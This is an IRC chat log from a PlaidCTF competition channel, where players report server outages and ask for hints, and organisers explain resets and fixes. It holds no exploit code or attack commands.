(05:55:36) (Hertz_) WhatsCat Web 300 8 minutes ago
(05:55:38) (Hertz_) like 6 times
(05:55:42) (Hertz_) race problem ?
(05:55:47) (SeawolfRN) does anyone else have their challenges all greyed out?
(05:55:51) (+clockish) Hertz_: yeah
(05:55:59) (+clockish) unfortunatley our DB people are asleep
(05:56:04) (stypr) they smoked chicken
(05:56:05) (+clockish) so it will stay like that until they wake up
(05:56:15) (stypr) so they must be high
(05:56:18) (+clockish) also MSLC are 1337 hackers, they probably pwned us :P
(05:57:47) (s_kunk) http://play.plaidctf.com/profile/460 <- what is this sorcery ?
(05:57:59) (pcc7) anyone working on nightmares?
(05:57:59) (s_kunk) 6x whatscat validations
(05:58:11) (sven) and they didn't even get #1 even with cheating :D
(06:00:16) (admiral0) clockish: could you please stop trolling me on the django application?
(06:00:29) (deject3d) oh so i'm not the only one being trolled on that problem
(06:00:32) (+clockish) admiral0: I WILL NEVER STOP TROLLING
(06:00:42) (+clockish) Also, I didn't make any django apps, what's the issue?
(06:00:59) (fritz[]) kpop down?
(06:01:00) (deject3d) i spent time testing obama for stego
(06:01:03) (admiral0) clockish: somebody is changing the files in my meme user dir
(06:01:04) qUit: (beugueuT4T) (4c871846ca@gateway/web/cgi-irc/kiwiirc.com/x-szfzakfsqubjpymb) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(06:01:23) (+clockish) admiral0: it's not us
(06:01:30) (deject3d) lol
(06:01:41) (+clockish) heh, we'll see
(06:01:48) (admiral0) clockish: uhm ok
(06:02:12) (deject3d) i just got the w3c css checkmark stamp of approval in my meme directory
(06:02:21) (+frozencemetery) beautiful
(06:03:39) (+clockish) I just kicked the current shells and reset the problem
(06:04:05) (deject3d) no pls merciful prankster, upload key to my meme folder
(06:04:13) (zoff_ita) web300 down?
(06:04:35) qUit: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
(06:06:12) qUit: ([1]Knight) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- IRC with a difference
(06:07:07) jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
(06:07:27) (insanitybit) https://www.youtube.com/watch?v=AjPau5QYtYs
(06:07:31) (insanitybit) ^important
(06:07:51) (synthverity) ^^^^^^^^^^^^^
(06:08:35) qUit: (nullProtectorate) (
[email protected]) Ping timeout: 258 seconds
(06:08:41) (synthverity) Fucking safety man.
(06:08:47) (synthverity) Need a whole dance for it
(06:09:14) (bobsteam) Seems like whatscat might need a kick?
(06:09:34) (acez) who can I talk to for kapp ?
(06:09:43) (fritz[]) kpop isnt working, error 500
(06:09:48) (acez) kappa*
(06:10:12) (doom) are the services dropping any characters?
(06:10:24) (acez) kappa admin ? anyone ?
(06:11:42) (synthverity) Who stayed up the whole night?
(06:11:49) (bobsteam) bingbing
(06:11:58) (bobsteam) granted, west coast, only 4am
(06:12:22) (upb) west coast of africa?:P
(06:13:23) jOin: (aassddff) (79a88098@gateway/web/freenode/ip.121.168.128.152)
(06:13:39) (bobsteam) .... yes, its currently 4am on the west coast of africa
(06:13:54) (deject3d) wow that chronosphere is powerful
(06:14:48) (poppopret) same
(06:14:50) (poppopret) in california
(06:15:00) (bobsteam) ^
(06:15:14) (+frozencemetery) bobsteam: one it, one moment
(06:16:23) (bobsteam) frozencemetery: ty :)
(06:16:34) (+frozencemetery) bobsteam: should be good to go; give it a moment just to be safe but yeah
(06:17:27) (acez) bobsteam: it's definitely not 4 am on the west coast of africa
(06:17:35) qUit: (aassddff) (79a88098@gateway/web/freenode/ip.121.168.128.152) Ping timeout: 240 seconds
(06:18:32) (bobsteam) acez: true, was being a smart ass, sorry =)
(06:18:57) (upb) yeah i was trying tobe a smart ass too,forgot theres only 1continent intheworld
(06:19:28) (AnthraX101) Of course there's only one, everyone knows that. The continent of north korea.
(06:19:51) (bobsteam) maybe multiple continents, but never the same time in multiple time zones. WOuld have been better to call out north or south america. or get country specific (since north america has multiple countries, zomg)
(06:19:56) (bobsteam) but anyway ~_~
(06:20:05) (bobsteam) too many smart people in this irc =P
(06:20:22) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(06:21:05) jOin: (qqqqqqqq) (b2ebfe2d@gateway/web/freenode/ip.178.235.254.45)
(06:23:25) (mak`) please fix your scorebord ;]
(06:25:40) (Redford) http://play.plaidctf.com/profile/460
(06:25:45) (Redford) nice solves :)
(06:25:56) (Tapyroe__) yay! :D finally scored some points lol
(06:26:04) (Redford) :D
(06:26:59) (Redford) tylerni7, mserrano: plz fix it ;)
(06:27:00) (+frozencemetery) we will fix the database later; right now we are working on other things
(06:27:04) (Redford) ok
(06:27:14) (+frozencemetery) the two people you just hilighted are both asleep
(06:27:34) (Redford) kk
(06:28:37) qUit: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd) Remote host closed the connection
(06:29:09) qUit: ([1]Knight) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Chicks dig it
(06:30:23) jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
(06:31:42) jOin: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd)
(06:33:31) nIck: (pctf_watcher) is now known as (scoreboard)
(06:33:42) nIck: (scoreboard) is now known as (pctf_scoreboard)
(06:34:28) (insanitybit) so like the site is down for everyone right
(06:35:06) (HENLEYbls) nope still up for me insanitybit
(06:35:13) (insanitybit) yeah nevermind got a 502
(06:35:18) (corpille) sometimes got 502
(06:35:24) (insanitybit) its up now
(06:35:25) (supersat) wtf... i can't write to the stack on tenement?
(06:35:37) (supersat) (or anywhere, actually)
(06:35:44) (pcc7) anyone workingon nightmares?
(06:35:46) (insanitybit) who needs to write
(06:35:48) (insanitybit) when you can read???
(06:36:50) (supersat) i'm just kind of baffled how that's possible
(06:38:21) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(06:39:16) (insanitybit) why
(06:39:27) (+frozencemetery) the site is up
(06:40:53) (bobsteam) ok cats has me cursing, going to bed. g'night all :)
(06:43:05) qUit: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60) Ping timeout: 240 seconds
(06:44:07) ([SF]testdata) @frozencemetery : any good news on heartbleed ?
(06:44:43) (+frozencemetery) [SF]testdata: hopefully up soon, but in the meantime maybe work on something else, sorry
(06:45:01) (+frozencemetery) hungover hearts don't bleed right, so we've got a bit of a shortage
(06:46:15) (+frozencemetery) [SF]testdata: it also says that in the problem description, so...
(06:47:18) (whois) whois 0xffa guys
(06:47:22) ([SF]testdata) lol .. alrighty .. we will await for them to rejuvenate soon ;)
(06:50:35) qUit: (approximatehack) (7ab326bb@gateway/web/freenode/ip.122.179.38.187) Ping timeout: 240 seconds
(06:51:05) qUit: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
(07:01:27) jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
(07:03:33) jOin: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250)
(07:03:45) (B1N4RY) I'm back! haha
(07:04:05) (n00bz) who i can pm about web150?
(07:04:12) (B1N4RY) Now ready to run through this fun CTF for the next 30 hours
(07:13:27) (+frozencemetery) n00bz: hit me
(07:15:35) qUit: (pcc7) (72560111@gateway/web/freenode/ip.114.86.1.17) Ping timeout: 240 seconds
(07:21:38) (stypr) dat kpop
(07:21:46) (stypr) I like kpop but when it comes to pwnage
(07:21:48) (stypr) ..lol
(07:23:01) jOin: (pcc7) (ca780766@gateway/web/freenode/ip.202.120.7.102)
(07:25:44) (B1N4RY) stypr did you solve mtpox
(07:25:51) (stypr) no
(07:25:55) (stypr) do you think I did? lol
(07:25:59) (stypr) I am playing games now
(07:26:04) (B1N4RY) lol
(07:26:13) (B1N4RY) U play bf4?
(07:26:20) (stypr) I am not well today
(07:26:25) (stypr) no not bfs
(07:26:26) (B1N4RY) Hmm..
(07:26:50) (B1N4RY) Please don't tell me that you are one of those ****ing cod fanboiiieeesss...
(07:27:18) (pcc7) anyone working on nightmares,pyjail?
(07:27:38) (stypr) oh i play cod sometimes
(07:27:47) (stypr) with my friends in weekends
(07:28:02) (HENLEYbls) B1N4RY: I play BF4
(07:28:14) (stypr) I don't play those often
(07:28:31) (B1N4RY) HENLEYbls: What's your origin nickname? Let me add u
(07:28:42) (HENLEYbls) on Xbox 360 soon to be xBox One
(07:28:43) (B1N4RY) stypr: You play ghosts?
(07:28:48) (stypr) nope
(07:28:50) (B1N4RY) oh...xbox 360
(07:28:54) (stypr) lol
(07:29:11) (HENLEYbls) HENLEYbls I believe
(07:29:11) (B1N4RY) stypr: Which cod do you play with ur friends?
(07:29:12) (stypr) I used to play LoL often but now I just play old games like mario
(07:29:21) (B1N4RY) lol mario
(07:29:34) (HENLEYbls) Atari is where it's at :P
(07:29:45) (stypr) it's lame
(07:29:53) (+frozencemetery) AAAAAMMMMIIIIGAAAAAAAA
(07:29:56) (+frozencemetery) *ahem*, sorry
(07:29:58) (HENLEYbls) It's jokes!
(07:29:59) (B1N4RY) LoL is a great game too, but WoW, is just...soo f***ing addictive..
(07:30:07) (B1N4RY) AMIGA LOL
(07:30:22) qUit: (SeawolfRN) (5f95604f@gateway/web/cgi-irc/kiwiirc.com/ip.95.149.96.79) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(07:30:44) (neodyblue) is the heartbleed service up ?
(07:31:08) (B1N4RY) Is heartbleed about the recent OpenSSL vuln?
(07:31:39) (+frozencemetery) neodyblue: read the description
(07:31:48) (HENLEYbls) I would guess their are similarities yeah :P B1N4RY
(07:32:06) (+frozencemetery) heartbleed is actually about making the perfect Bloody Mary
(07:32:24) (HENLEYbls) Much confuse!
(07:32:36) qUit: (abc) (7506549f@gateway/web/freenode/ip.117.6.84.159) Quit: Page closed
(07:33:07) (+frozencemetery) such "tomato juice"!
(07:34:38) nIck: (Xor0X) is now known as (Xor0X_pwn100)
(07:36:18) jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
(07:38:38) qUit: (deject3d) (
[email protected]) Quit: Computer has gone to sleep.
(07:40:50) jOin: (Yolanda) (uid29179@gateway/web/irccloud.com/x-hytlcbhzztqaifai)
(07:41:20) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(07:41:51) (synick) is there a tv channel this time?
(07:42:22) (c0ax) Anyone to give me first clue to Web200 reeekee
(07:42:45) (whois) what a tor prob
(07:43:09) (+frozencemetery) ur a tor prob
(07:43:13) (+frozencemetery) :)
(07:43:28) (hellman) board down?
(07:43:31) (whois) whois 0xffa
(07:43:52) (+frozencemetery) site is up
(07:46:43) (acez) any kappa person around ?
(07:47:47) (fser) hi, is the tor challenge open?
(07:49:44) jOin: (mib_129) (80eee88d@gateway/web/cgi-irc/kiwiirc.com/ip.128.238.232.141)
(07:49:59) (mib_129) Is the website down?
(07:50:28) (auscompgeek) no
(07:50:55) (mib_129) is this the correct site http://play.plaidctf.com/?
(07:51:12) (c0ax) y
(07:51:29) (auscompgeek) wait, maybe it is
(07:51:29) (mib_129) and we are sure its up?
(07:51:47) (auscompgeek) well, it's up from my end
(07:51:58) (mib_129) i just want a challenge!
(07:52:28) (auscompgeek) hm, isup.me says it's up
(07:52:39) (auscompgeek) isitup.org says it's down
(07:52:43) qUit: (mekanismen) (~mek@unaffiliated/mekanismen) Ping timeout: 245 seconds
(07:52:47) (+frozencemetery) website is up
(07:52:50) (auscompgeek) wait, no, it's up
(07:52:55) (+frozencemetery) it will occasionally 500 error
(07:53:05) (+frozencemetery) as much as it pains me to say this, just try it again
(07:53:05) (auscompgeek) ah, ok
(07:53:05) qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
(07:53:20) (auscompgeek) do you guys know why it's erroring on occasion?
(07:53:27) (mib_129) anybody link me a download to ezhp?
(07:53:28) jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
(07:53:46) (+frozencemetery) no, hopefully one of our infra people will wake up soon
(07:53:47) (auscompgeek) c0ax: no, I can't give you any clues
(07:54:35) qUit: (qqqqqqqq) (b2ebfe2d@gateway/web/freenode/ip.178.235.254.45) Ping timeout: 240 seconds
(07:54:47) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(07:55:18) (bobsteam) is whatscat password reset actually supposed to send an email? or not really?
(07:55:41) qUit: (mib_129) (80eee88d@gateway/web/cgi-irc/kiwiirc.com/ip.128.238.232.141) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(07:56:09) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(07:56:57) (eastwolf2) G++ is my favorite so far :)
(07:57:08) (foundation) is ezhp down ?
(07:57:27) (upb) bobsteam: it did send multiple to mewhen i tested :)
(07:58:16) (bobsteam) upb: thanks, I haven't seen any. Maybe I need to figure that out. thx
(07:58:43) (+frozencemetery) we are looking into ezhp; please bear with us
(07:58:48) (foundation) k
(07:58:53) (foundation) tnx
(07:59:09) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Client Quit
(08:00:59) (mak`) who can i talk to about reekee?
(08:02:04) qUit: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd) Remote host closed the connection
(08:02:06) qUit: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173) Quit: Page closed
(08:02:37) (+frozencemetery) mak`: me, what's up?
(08:02:40) (+frozencemetery) (pm)
(08:02:49) jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
(08:06:00) (fser) whatscat db was cleared?
(08:08:46) (+frozencemetery) fser: we have to reset it every so often because web scale demands personal sacrifice of our pets
(08:08:52) qUit: (raudi) (
[email protected]) Quit: Miranda IM! Smaller, Faster, Easier. http://miranda-im.org
(08:09:52) (fser) ok
(08:10:06) (fser) frozencemetery: do you know about rendezvous beeing up or not?
(08:10:11) (fser) can't reach that .onion
(08:10:25) (+frozencemetery) that problem is working as intended
(08:10:36) (fser) ok :-)
(08:10:51) (fser) thanks!
(08:15:49) (+frozencemetery) np
(08:16:08) (+mserrano) goddamn it leetmore
(08:16:10) (+mserrano) y u do dis
(08:16:32) (hellman) wasn't it the bonus challenges? :|
(08:16:49) (+mserrano) lol
(08:16:58) (+mserrano) I really don't know how that even happens
(08:17:29) (hellman) btw i still have site empty :(
(08:17:38) (+mserrano) hellman: the main site?
(08:17:51) (+mserrano) hellman: also, I deleted 5 of your 6 solutions of whatscat
(08:17:52) (+frozencemetery) foundation: ezhp should be back up now
(08:18:07) (+mserrano) I assume that that was not intentional and was just a hilarious side effect of the site getting real slow
(08:18:39) (hellman) mserrano: yes
(08:18:39) (foundation) frozencemetery: it is, thanks
(08:18:52) (auscompgeek) how does one submit multiple solutions to a challenge O_o
(08:19:50) (+frozencemetery) there is a submit field
(08:19:57) (+frozencemetery) to the right of the gameboard
(08:20:50) (foundation) frozencemetery: you can shut down ezhp again as far as i'm concerned :)
(08:21:11) (+frozencemetery) lol
(08:21:47) (upb) auscompgeek: probably using a webscale db :)
(08:23:13) (+mserrano) auscompgeek: I'm... really not sure
(08:23:37) (+mserrano) I didn't write the site, so...
(08:23:50) jOin: (bloup_) (95acea33@gateway/web/freenode/ip.149.172.234.51)
(08:23:51) (+mserrano) it does seem to be misbehaving
(08:23:58) (+mserrano) when the right people are awake again they will get on it
(08:24:23) jOin: (Neuroticar) (~neurotica@unaffiliated/neuroticar)
(08:24:44) (Neuroticar) why is misc 10 down?
(08:25:27) (n00bz) who i can pm about web150?
(08:25:54) (+mserrano) n00bz: if you mean mtpox, me
(08:26:23) (+mserrano) Neuroticar: if you mean heartbleed, you should try multiple ports
(08:26:43) (+frozencemetery) it's postgres iirc
(08:26:56) (+frozencemetery) oh good I don't have to answer questions about mtpox anymore :D
(08:27:05) (mttpgrm) isn't heartbleed still down?
(08:27:54) (foundation) mserrano: what different ports, can you update the message?
(08:28:07) (plaintext) reekee, reekee, it rhymes with leeakee
(08:28:22) (pcc7) anyone working on pyjail?
(08:28:30) (+mserrano) foundation: 10000-11000 are in the message, aren't they?
(08:28:32) +mserrano checks
(08:28:35) qUit: (admiral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197) Ping timeout: 240 seconds
(08:28:36) (+mserrano) (I did update it a while ago)
(08:29:20) (mttpgrm) first line of the message still reads "STILL DOWN SORRY" for me
(08:29:29) (Neuroticar) me too
(08:29:29) (foundation) yep
(08:29:31) (+clockish) that's because it's still down
(08:29:34) (nullProtectorate) same for me
(08:29:35) (mttpgrm) i figured that
(08:29:54) (+clockish) but, it will be up in like 10 min, for real, hopefully, this time
(08:29:55) (+mserrano) oh bleh it was changed while i was asleep
(08:30:07) (+frozencemetery) mserrano: the world is constantly changing!
(08:30:24) (+clockish) mserrano: and you should change your location to the CIC
(08:30:30) (foundation) oh, ok
(08:30:32) (+mserrano) yes yes
(08:30:36) (+mserrano) I should shower first
(08:30:46) jOin: (sameer) (47b3654a@gateway/web/freenode/ip.71.179.101.74)
(08:30:51) (sameer) hello
(08:30:53) (+frozencemetery) atomicly!
(08:30:59) (+clockish) hi!
(08:31:00) (sameer) i am trying to do the heartbleed
(08:31:01) (sameer) https://54.82.147.138:45373
(08:31:03) (+clockish) it's down
(08:31:07) (sameer) the server is not working
(08:31:11) (+frozencemetery) it even says in the description that it is down
(08:31:14) (sameer) really
(08:31:15) (+clockish) like it says in the description ;)
(08:31:42) (+clockish) it may be up very soon though.
(08:31:59) (sameer) ok
(08:32:06) jOin: (Bijan-E) (~bijan-e@unaffiliated/bijan-e)
(08:33:25) qUit: (naavin_away) (~naavinm@unaffiliated/naavinm) Remote host closed the connection
(08:34:56) qUit: (sameer) (47b3654a@gateway/web/freenode/ip.71.179.101.74) Client Quit
(08:35:36) (f0rki) na
(08:36:01) jOin: (def) (2a705e33@gateway/web/freenode/ip.42.112.94.51)
(08:36:10) (def) who can help me web 150
(08:36:18) (+frozencemetery) pm
(08:36:21) (+frozencemetery) def: ^
(08:36:47) (mischa__) you should reduce cash prizes and invest more money in stable servers
(08:37:25) (Neuroticar) mischa__, +1
(08:38:05) (+mserrano) if throwing more money at the server would fix it believe me we would have done it
(08:38:05) jOin: (pnX) (~pnx@unaffiliated/pnx)
(08:42:40) (iZsh) or ppl could invest in a brain instead of running dirbuster :)
(08:43:08) (+frozencemetery) darbastar
(08:43:33) (WhizzMan) derpbester
(08:43:35) qUit: (Redford) (
[email protected]) Read error: Connection reset by peer
(08:45:34) qUit: (hanja617) (
[email protected]) Quit: AndroIRC - Android IRC Client ( http://www.androirc.com )
(08:51:45) qUit: (j0f) (~amirreza@unaffiliated/j0f) Read error: Connection reset by peer
(08:51:54) (+mserrano) important note for people:
(08:52:15) jOin: (j0f) (~amirreza@unaffiliated/j0f)
(08:52:55) (Gynvael) <silence>
(08:53:38) (+mserrano) Kappa's binary has been updated to match the version on the server. My bad, I thought we had updated both and we didn't.
(08:53:53) (+mserrano) The bug should hopefully be the same.
(08:54:05) jOin: (nvmr) (5164f498@gateway/web/freenode/ip.81.100.244.152)
(08:54:16) (pcc7) any help for pyjail?
(08:54:17) (nvmr) is heartbleed website down?
(08:54:32) (+mserrano) Gynvael: was just making sure my change actually went through
(08:55:38) qUit: (FattyMcFatterson) (
[email protected]) Ping timeout: 245 seconds
(08:56:04) (+mserrano) (thanks to beollejavi for pointing it out)
(08:56:39) (fritz[]) yeah heartbleed seems down again :(
(08:57:47) (nvmr) thx fritz
(08:58:51) jOin: (Frisk0) (~Frisk0@2601:7:9e00:8f:7113:3ac:9f72:3881)
(08:59:51) (+clockish) heartbleed should be back up now
(09:00:05) qUit: (def) (2a705e33@gateway/web/freenode/ip.42.112.94.51) Ping timeout: 240 seconds
(09:00:14) (+clockish) nvmr fritz[] anyone ^
(09:00:24) (fritz[]) yeah, confirmed
(09:00:25) (fritz[]) thx
(09:00:26) jOin: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173)
(09:00:33) (nagi_) hi
(09:00:37) (+clockish) hello!
(09:02:58) qUit: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128) Read error: Connection reset by peer
(09:03:02) (nvmr) is back up, yes
(09:06:57) qUit: (j0f) (~amirreza@unaffiliated/j0f) Quit: Quit
(09:08:08) qUit: (Bijan-E) (~bijan-e@unaffiliated/bijan-e) Ping timeout: 245 seconds
(09:08:19) jOin: (j0f) (~j0f@unaffiliated/j0f)
(09:08:58) (n00bz) any help on web150?
(09:09:45) (mongo12) I just noticed you can click something on the board to see more challenges :/
(09:09:52) ([CISSP]HoLyVieR) someone might need to restart kpop apache instance
(09:09:53) (mongo12) but since site is so laggy, not sure what I clicked
(09:11:41) ([CISSP]HoLyVieR) I might have just found a bug which reliably crash apache server
(09:12:05) qUit: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250) Ping timeout: 240 seconds
(09:12:05) qUit: (f___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130) Ping timeout: 240 seconds
(09:12:11) (+tylerni7) ugh
(09:12:12) (+tylerni7) alright
(09:12:14) (+tylerni7) I just woke up
(09:12:23) (+tylerni7) morning everyone
(09:12:53) qUit: ([1]Knight) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Would you like to know more?
(09:12:58) (k00mi) mongo12: centerof that circle thingy
(09:15:58) (corpille) nice heartbleed !
(09:16:28) (+clockish) yeah it's back
(09:17:38) qUit: (j0f) (~j0f@unaffiliated/j0f) Quit: Leaving
(09:18:06) jOin: (j0f) (~j0f@unaffiliated/j0f)
(09:22:03) jOin: (the_doctor) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(09:22:23) (the_doctor) I tried sending an email to
[email protected], but that address doesn't seem to exist.
(09:22:27) nIck: (the_doctor) is now known as (Guest76035)
(09:23:05) (+tylerni7) Guest76035: not sure where you saw that email
(09:23:21) (Guest76035) It's on your rules page.
(09:23:24) (+tylerni7) lol
(09:24:11) (j0f) g++ file is 404 ?
(09:24:17) (MavJS) lulz, indeed
(09:24:47) (j0f) nvm, got it
(09:25:01) (Guest76035) Thanks for the correct email address.
(09:25:07) (+frozencemetery) g++ file should be okay, let me know if there's a problem with it
(09:25:50) nIck: (vladum|away) is now known as (vladum_)
(09:26:54) nIck: (sweet_potatoes) is now known as (_ML)
(09:27:03) jOin: (adniral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
(09:27:42) (slinkyman) g++ is 404ing for me too
(09:28:09) (slinkyman) working now
(09:28:27) jOin: (virodoran) (uid2011@gateway/web/irccloud.com/x-nkhkmgpqfkcsbbie)
(09:29:28) jOin: (glzd) (7505d457@gateway/web/freenode/ip.117.5.212.87)
(09:31:21) (nvmr) rendezvous onion site down?
(09:31:59) (+frozencemetery) nvmr: it is working
(09:32:32) (nvmr) ok, ty
(09:32:38) (nvmr) must be something my end
(09:34:41) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Quit: Page closed
(09:34:52) (plaintext) reekee is so slow :(
(09:34:52) (+tylerni7) keep in mind it isn't just a tor hidden service, it's more complex than that
(09:35:29) (adniral0) plaintext: I feel this pain too
(09:35:46) (sven) is the heartbleed back up btw? :D
(09:35:48) nIck: (adniral0) is now known as (admiral0)
(09:35:48) (mak`) tylerni7: you dont say?
(09:36:00) (Hertz_) =))
(09:36:08) (+tylerni7) plaintext: I see no load on it, and it loaded fast for me?
(09:36:12) (+tylerni7) what issue are you having?
(09:36:16) (sven) ah, nvm
(09:38:06) qUit: (Stean) (
[email protected]) Read error: Connection reset by peer
(09:38:52) (plaintext) tylerni7: oh, we solved it now :)
(09:38:58) (+tylerni7) ok
(09:39:04) (plaintext) tylerni7: it was slow though, for a long time
(09:39:04) (+tylerni7) :)
(09:39:08) (+tylerni7) weird
(09:39:09) (plaintext) tylerni7: sometimes it would answer quickly
(09:39:11) (+tylerni7) could be dirbuster
(09:39:11) jOin: (tarkiz) (~tarkiz@2001:470:e328:b000:304e:abd6:bc0d:de67)
(09:39:24) (+tylerni7) people sending 1k conns/second or whatever make our servers sad
(09:39:28) (plaintext) why would anyone dirbust when you have the source
(09:39:30) (plaintext) makes me want to cry
(09:39:37) (kushou) yeah, 502 right now :(
(09:39:38) (+tylerni7) plaintext: I know.. and yet...
(09:39:50) (+tylerni7) kushou: it happens occasionally, and the web guys aren't here
(09:39:58) (+tylerni7) kushou: just refresh and it should work /most of the time/
(09:40:02) (kushou) yeah
(09:40:07) (kushou) it's almost back, thanks
(09:40:11) (+tylerni7) I know it's frustrating :/ sorry
(09:40:29) (kushou) needs JS, it's my fault this time :P
(09:40:38) (+tylerni7) :P
(09:40:43) (corpille) main site still giving a lot of 502 :/
(09:40:57) jOin: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250)
(09:41:02) (B1N4RY) 502 502 502 502!!!!!
(09:41:03) (+tylerni7) corpille: refresh, the majority of the time it should work... I don't know
(09:41:20) (B1N4RY) tylerni7: doesn't work..
(09:41:20) (+tylerni7) hmm
(09:41:23) (+tylerni7) it seems sad
(09:41:25) (+tylerni7) looking into it
(09:41:26) (+tylerni7) sorry
(09:41:35) qUit: (glzd) (7505d457@gateway/web/freenode/ip.117.5.212.87) Ping timeout: 240 seconds
(09:42:06) (corpille) yeah it works sometimes to show the website but when you want to load the challenge it fails
(09:42:44) (+tylerni7) seems back now... maybe...
(09:42:45) (+tylerni7) ugh
(09:42:50) +mserrano hates computers
(09:42:57) (+tylerni7) the people who wrote the infrastructure are asleep
(09:43:48) (jagger_) you mean they ar enot on-call? :)
(09:43:51) (jagger_) with pagers
(09:43:57) (+tylerni7) jagger_: eh we can phone them
(09:43:58) (+tylerni7) but :P
(09:44:04) (jagger_) just kidding
(09:44:15) (B1N4RY) Can someone help me with heartbleed with pm?
(09:44:22) (+tylerni7) B1N4RY: pm clockish
(09:45:13) jOin: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:45:25) pArt: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:45:55) (admiral0) tylerni7: reekee keeps killing users I create
(09:46:09) (+tylerni7) admiral0: "killing"
(09:46:12) (+tylerni7) can you be more precise?
(09:46:46) (admiral0) user is either None but it won't register
(09:46:51) (admiral0) or it's not active
(09:46:54) (f0rki) same here are you guys resetting the db periodically?
(09:47:06) (+tylerni7) f0rki: yes
(09:47:10) (f0rki) ah ok
(09:47:44) (admiral0) tylerni7: the only explanation is that it's not active any more
(09:48:03) (f0rki) so no flags in the db ^^
(09:48:25) (admiral0) is there a regexp for a flag?
(09:48:30) (+tylerni7) admiral0: the db refreshed periodically
(09:48:35) (+tylerni7) so maybe tht's what you're seeing
(09:48:44) (admiral0) i can't register any more that user
(09:48:52) jOin: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:49:06) (+tylerni7) admiral0: pm me maybe
(09:49:13) (+tylerni7) this sounds like it's working fine
(09:49:14) (supersat) heh... the pctf interface reminds me that the MS Surface ships with the Program Manager group migration tool... just in case you're upgrading your ARM tablet from Windows 3.1 :P
(09:49:26) pArt: (aaaaaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:50:58) qUit: (thx1143) (
[email protected]) Quit: This computer has gone to sleep
(09:53:36) jOin: (hoxy) (5d53a8a2@gateway/web/freenode/ip.93.83.168.162)
(09:53:37) qUit: (tarkiz) (~tarkiz@2001:470:e328:b000:304e:abd6:bc0d:de67) Ping timeout: 252 seconds
(09:53:42) (hellman) open new challs!
(09:54:38) (+tylerni7) hellman: maybe in a bit
(09:54:48) (+tylerni7) you should get rsa in the mean time :)
(09:56:15) (acez) I never liked pokemon
(09:56:16) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(09:56:37) (chuckleberry) heart bleed working fine
(09:56:41) (chuckleberry) gg guys
(09:57:03) (xp45g) anybody i can pm for reekee?
(09:57:09) (+tylerni7) xp45g: me
(09:57:53) (iZsh) no need to open new challs, we'll open them ;-)
(09:58:42) (+mserrano) if we stay stuck here a bit longer we might manually open one
(09:58:43) (+mserrano) but not yet
(09:59:10) (kanghee) reekee 500 :(
(09:59:12) (ShortKidd) that was a longer than 4 hour sleep...
(10:00:11) (ryan-c) tylerni7: pm'd you a question about rsa
(10:00:28) jOin: (asdfafs) (afc14aa8@gateway/web/freenode/ip.175.193.74.168)
(10:01:34) (f0rki) reekee seems to be down
(10:02:02) (+tylerni7) f0rki: hm will look at it
(10:02:03) (eastwolf_) do you want the hex for the heartbleed flag? we're typing it in a bunch of different ways and having trouble ><
(10:02:16) jOin: (def) (2a709cb3@gateway/web/freenode/ip.42.112.156.179)
(10:02:36) (Guest76035) @eastwolf - include the "flag" part
(10:02:46) (+tylerni7) eastwolf_: it's all printable... why would you give hex -_-
(10:03:20) (shabgard) flag{somwthing}
(10:03:23) (quangntenemy) is reekee down? all i see is blank
(10:03:25) (+tylerni7) f0rki: try now
(10:03:35) (eastwolf_) OH! thanks guest :)
(10:03:36) (+tylerni7) quangntenemy: I just refreshed stuff
(10:04:04) (stypr) sup quangntenemy
(10:04:05) (criple_ripper) tylerni7 still down i think :(
(10:04:18) (kanghee) yep still returns 500
(10:04:18) (f0rki) yep still down
(10:04:21) jOin: (ByteMyEth0) (18fe8dec@gateway/web/freenode/ip.24.254.141.236)
(10:04:23) jOin: (paul_55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243)
(10:04:26) (stypr) django
(10:04:27) (+tylerni7) ouch, was up for a second but died
(10:04:29) (stypr) DJ ango
